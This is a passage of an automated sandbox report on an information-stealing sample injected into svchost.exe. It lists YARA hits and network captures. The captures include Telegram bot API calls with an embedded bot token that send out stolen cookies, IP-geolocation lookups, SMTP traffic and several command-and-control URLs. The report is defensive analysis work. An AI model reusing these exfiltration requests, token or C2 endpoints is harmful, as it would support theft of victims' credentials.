              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AF23Ch6_2_092AEF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AF694h6_2_092AF3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AE0DCh6_2_092ADE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_092A0676
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AE534h6_2_092AE288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AE98Ch6_2_092AE6E0

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 118.69.190.131 587Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Yara detected Generic Downloader
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: global trafficTCP traffic: 192.168.2.5:49734 -> 118.69.190.131:587
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcae9abfa21153Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: FPT-AS-APTheCorporationforFinancingPromotingTechnolo FPT-AS-APTheCorporationforFinancingPromotingTechnolo
              Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: global trafficTCP traffic: 192.168.2.5:49734 -> 118.69.190.131:587
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C6CE44
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: mail.vvtrade.vn
              Source: unknownHTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 01:34:48 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 01:35:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
              Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
              Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/OuqGbJkzwhU.crl0
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2148911676.0000000007931000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
              Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
              Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt05
              Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.vvtrade.vn
              Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Ges0%
              Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
